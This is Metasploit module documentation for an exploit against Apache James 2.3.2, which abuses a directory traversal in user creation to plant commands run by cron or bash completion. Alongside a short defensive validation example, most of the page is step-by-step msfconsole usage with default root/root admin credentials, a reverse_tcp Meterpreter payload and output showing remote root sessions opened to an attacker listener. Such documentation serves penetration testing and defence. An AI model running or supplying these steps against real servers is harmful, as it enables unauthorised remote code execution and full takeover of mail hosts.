metasploit-gs/documentation/modules/exploit/linux/smtp/apache_james_exec.md
## Vulnerable Application
This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2.
By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file.
Instructions for installing the vulnerable application for testing can be found here:
https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf
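The root cause above is a username that is used to build a filesystem path without being validated. The following is an added example, not code from Apache James or from this module, of the two checks that close that gap: an allow-list on the name and a containment check on the resolved path. The mail root path, the function names and the sample usernames are constructed for the example.

```python
import posixpath
import re

# Constructed mail repository root; not the real James 2.3.2 layout.
MAIL_ROOT = "/opt/james/var/mail/inboxes"

# Allow-list of account-name characters: no '/' or '\\' and no leading '.',
# so a name can never contain a path separator or be a '..' component.
SAFE_USERNAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def username_is_safe(username: str) -> bool:
    """Allow-list check of the kind James 2.3.2's user creation lacked."""
    return bool(SAFE_USERNAME.match(username))


def resolved_mailbox(username: str) -> str:
    """Where an unchecked join of MAIL_ROOT and the raw name lands after
    normalisation; this is what turns a name into a write elsewhere."""
    return posixpath.normpath(posixpath.join(MAIL_ROOT, username))


def vet_username(username: str) -> tuple:
    """Return (True, mailbox_path) for an acceptable name, else (False, reason).
    The allow-list and the containment check are both applied so that a gap
    in one does not become a write outside MAIL_ROOT."""
    if not username_is_safe(username):
        return False, "username contains characters outside the allow-list"
    path = resolved_mailbox(username)
    if posixpath.commonpath([MAIL_ROOT, path]) != MAIL_ROOT:
        return False, "username resolves outside the mail root"
    return True, path


if __name__ == "__main__":
    # Constructed sample names: an ordinary account and a traversal-shaped
    # name pointing at the directory used by the Bash Completion target.
    for name in ("alice", "../../../../../etc/bash_completion.d"):
        ok, info = vet_username(name)
        print(f"{name!r}: {'accepted' if ok else 'rejected'} ({info})")
```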
## Verification Steps
__1.__ Start msfconsole
__2.__ DO: Load module exploit/linux/smtp/apache_james_exec
__3.__ DO: Set the remote and local options: rhosts, lhost, lport
__4.__ DO: Set the preferred payload
__5.__ DO: Run the check method to determine vulnerability
__6.__ DO: Run the exploit
__7.__ The payload will connect to the listener if the exploit is successful
## Options
**USERNAME:** The administrator username for the Apache James 2.3.2 remote administration tool. By default this is 'root'.
**PASSWORD:** The administrator password for the Apache James 2.3.2 remote administration tool. By default this is 'root'.
**ADMINPORT:** The port for the Apache James 2.3.2 remote administration tool. By default this is '4555'.
**RHOSTS:** The IP address of the vulnerable server.
**RPORT:** The port number of the SMTP service.
**POP3PORT:** The port for the POP3 Apache James service. By default this is '110'.
## Scenarios
**If using Cron exploitation method:** This method allows for automatic execution of the payload with no user interaction
required and gives the attacker root privileges. It will also attempt to automatically clean up the malicious user and the
mail objects.
__1.__ Load the module:
```
msf5 > use exploit/linux/smtp/apache_james_exec
```
__2.__ Set remote and local options:
```
msf5 exploit(linux/smtp/apache_james_exec) > set target 1
target => 1
msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.169
rhosts => 192.168.224.169
msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
lhost => 192.168.224.167
msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
lport => 4444
```
__3.__ Set payload:
```
msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
```
__4.__ Check version and run exploit:
```
msf5 exploit(linux/smtp/apache_james_exec) > check
[*] 192.168.224.164:25 - The target appears to be vulnerable.
msf5 exploit(linux/smtp/apache_james_exec) > exploit
[*] Started reverse TCP handler on 192.168.224.167:4444
[+] 192.168.224.169:25 - Waiting 60 seconds for cron to execute payload
[*] Sending stage (3021284 bytes) to 192.168.224.169
[*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.169:38694) at 2020-02-02 16:30:02 -0800
[*] 192.168.224.169:25 - Command Stager progress - 100.00% done (812/812 bytes)
meterpreter >
```
---------------------------------------------------------------------------------------------
**If using Bash Completion:** This method may be preferable when targeting a Linux operating system, such as some versions of Ubuntu, on which
the cron method fails. This exploitation method will leave an Apache James mail object artifact in the
/etc/bash_completion.d directory as well as the malicious user account.
__1.__ Load the module:
```
msf5 > use exploit/linux/smtp/apache_james_exec
```
__2.__ Set remote and local options:
```
msf5 exploit(linux/smtp/apache_james_exec) > set target 0
target => 0
msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164
rhosts => 192.168.224.164
msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
lhost => 192.168.224.167
msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
lport => 4444
```
__3.__ Set payload:
```
msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
```
__4.__ Check version and run exploit:
```
msf5 exploit(linux/smtp/apache_james_exec) > check
[*] 192.168.224.164:25 - The target appears to be vulnerable.
msf5 exploit(linux/smtp/apache_james_exec) > exploit
[*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)
```
__5.__ Set up and run listener (can be done before running the exploit):
```
msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > set lhost 192.168.224.167
lhost => 192.168.224.167
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.224.167:4444
[*] Sending stage (3021284 bytes) to 192.168.224.164
[*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800
meterpreter >
```
## Targets
```
Id Name
-- ----
0 Bash Completion
1 Cron
```
## References
1. <https://www.exploit-db.com/exploits/35513>
2. <https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf>